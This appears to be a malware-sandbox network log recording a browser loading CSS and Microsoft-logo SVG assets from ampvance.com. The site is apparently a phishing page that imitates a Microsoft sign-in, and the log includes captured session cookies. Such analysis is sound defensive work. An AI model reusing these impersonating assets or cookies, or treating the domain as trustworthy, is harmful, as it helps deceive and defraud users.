                                                      2024-03-05 13:23:45 UTC1369INData Raw: 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 38 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e
                                                      Data Ascii: ace:nowrap;text-overflow:ellipsis;max-height:84.5432px;max-height:5.28395rem}.text-headline.text-maxlines-2{max-height:164.5432px;max-height:10.28395rem}.text-headline.text-maxlines-3{max-height:244.5432px;max-height:15.28395rem}.text-headline.text-maxlin
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 2c 68 32 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 36 2e 33 36 32 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 33 39 37 36 35 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 32 70 78 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 33 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d
                                                      Data Ascii: ,h2.text-maxlines-4{max-height:166.3624px;max-height:10.39765rem}.text-title,h3{font-size:24px;line-height:28px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px}.text-title.text-maxlines-1,h3.text-maxlines-
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 30 32 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 30 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 38 39 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 37 37 32 37 72 65 6d 7d 2e
                                                      Data Ascii: nowrap;text-overflow:ellipsis;max-height:16.3632px;max-height:1.0227rem}.text-caption.text-maxlines-2,h5.text-maxlines-2{max-height:30.3632px;max-height:1.8977rem}.text-caption.text-maxlines-3,h5.text-maxlines-3{max-height:44.3632px;max-height:2.7727rem}.
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 39 30 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 35 35 36 38 72 65 6d 7d 2e 74 65 78 74 2d 62 6f 64 79 2c 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 32 37 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 32 32 37 70 78 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73
                                                      Data Ascii: 9088px;max-height:2.5568rem}.text-body,p{font-size:15px;line-height:20px;font-weight:400;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px}.text-body.text-maxlines-1,p.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 70 78 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 32 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 32 70 78 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 72 65 76 65 72 73 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 70 75 6c 6c 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b
                                                      Data Ascii: ine-block;padding-left:4px;padding-right:4px}blockquote{padding:8px 12px;margin:0 0 12px}.blockquote-reverse,blockquote.pull-right{padding-right:12px;padding-left:0;text-align:right}address{margin-bottom:12px}.container,.container-fluid{margin-right:auto;
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 38 2c 2e 63 6f 6c 2d 73 6d 2d 31 38 2c 2e 63 6f 6c 2d 6d 64 2d 31 38 2c 2e 63 6f 6c 2d 6c 67 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 73 6d 2d 31 39 2c 2e 63 6f 6c 2d 6d 64 2d 31 39 2c 2e 63 6f 6c 2d 6c 67 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 73 6d 2d 32 30 2c 2e 63 6f 6c 2d 6d 64 2d 32 30 2c 2e 63 6f 6c 2d 6c 67 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 73 6d 2d 32 31 2c 2e 63 6f 6c 2d 6d 64 2d 32 31 2c 2e 63 6f 6c 2d 6c 67 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 32 2c 2e 63 6f 6c 2d 6c 67 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 73 6d 2d 32 33 2c 2e 63 6f 6c 2d 6d 64 2d 32 33 2c 2e 63 6f 6c 2d 6c 67 2d 32 33 2c
                                                      Data Ascii: 8,.col-sm-18,.col-md-18,.col-lg-18,.col-xs-19,.col-sm-19,.col-md-19,.col-lg-19,.col-xs-20,.col-sm-20,.col-md-20,.col-lg-20,.col-xs-21,.col-sm-21,.col-md-21,.col-lg-21,.col-xs-22,.col-sm-22,.col-md-22,.col-lg-22,.col-xs-23,.col-sm-23,.col-md-23,.col-lg-23,


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.449788104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:44 UTC1197OUTGET /o/048a11303f2c0b13c71de5123e30fffb65e71ce053c02 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:45 UTC734INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:45 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:23:44 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nB5V5WhDjjsEKRZYzSx0nZjUvcUZ7zekHAJw0UCQr0L7PCrm53UQBmJqvZokzdtAMMZ6H28IM9yXRgz1Y2NUesGpKbdSClkPd1JPL4XdPfGapIXDr%2FkEwJF9vHnBf9E%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c1d4d73434f-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:45 UTC635INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                      Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 34 2e 39 30 38 2c 35 2e 36 34 31 2c 35 2e 36 34 31 2c 30 2c 30 2c 31 2c 31 2e 34 2d 33 2e 39 33 32 2c 35 2e 30 35 35 2c 35 2e 30 35 35 2c 30 2c 30 2c 31 2c 33 2e 39 35 35 2d 31 2e 35 34 35 2c 35 2e 34 31 34 2c 35 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33
                                                      Data Ascii: 4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 2c 30 2c 30 2c 30 2d 2e 33 39 2d 2e 38 31 33 2c 35 2e 37 36 38 2c 35 2e 37 36 38 2c 30 2c 30 2c 30 2d 31 2e 34 37 37 2d 2e 37 36 35 2c 34 2e 35 36 34 2c 34 2e 35 36 34 2c 30 2c 30 2c 31 2d 31 2e 38 32 39 2d 31 2e 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33
                                                      Data Ascii: ,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3
                                                      2024-03-05 13:23:45 UTC285INData Raw: 36 33 5a 22 20 66 69 6c 6c 3d 22 23 37 33 37 33 37 33 22 2f 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 32 35 30 32 32 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30
                                                      Data Ascii: 63Z" fill="#737373"/><rect width="10.931" height="10.931" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10
                                                      2024-03-05 13:23:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.449786104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:44 UTC1167OUTGET /ASSETS/img/m_.svg HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:45 UTC731INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:45 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:23:45 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: MISS
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FpEbiIHEf6wt5KG8Z0z4k1xf4epHPXC5mSFiPc4k1oUlL4POmSpFgDij1iWqzJUKGexD7YWkJdjUDwIllWYM1JNOPHLGt4%2Be9EvT66KZ3Acp88ep1nGgykICUjzL5MY%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c1d6a968c09-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:45 UTC638INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                      Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 30 38 2c 35 2e 36 34 31 2c 35 2e 36 34 31 2c 30 2c 30 2c 31 2c 31 2e 34 2d 33 2e 39 33 32 2c 35 2e 30 35 35 2c 35 2e 30 35 35 2c 30 2c 30 2c 31 2c 33 2e 39 35 35 2d 31 2e 35 34 35 2c 35 2e 34 31 34 2c 35 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33 2c 32 2e
                                                      Data Ascii: 08,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 30 2c 30 2d 2e 33 39 2d 2e 38 31 33 2c 35 2e 37 36 38 2c 35 2e 37 36 38 2c 30 2c 30 2c 30 2d 31 2e 34 37 37 2d 2e 37 36 35 2c 34 2e 35 36 34 2c 34 2e 35 36 34 2c 30 2c 30 2c 31 2d 31 2e 38 32 39 2d 31 2e 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33 2e 36 2c
                                                      Data Ascii: 0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,
                                                      2024-03-05 13:23:45 UTC282INData Raw: 22 20 66 69 6c 6c 3d 22 23 37 33 37 33 37 33 22 2f 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 32 35 30 32 32 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33
                                                      Data Ascii: " fill="#737373"/><rect width="10.931" height="10.931" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.93
                                                      2024-03-05 13:23:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.449785104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:44 UTC1171OUTGET /ASSETS/img/sig-op.svg HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      Accept-Encoding: gzip, deflate, br
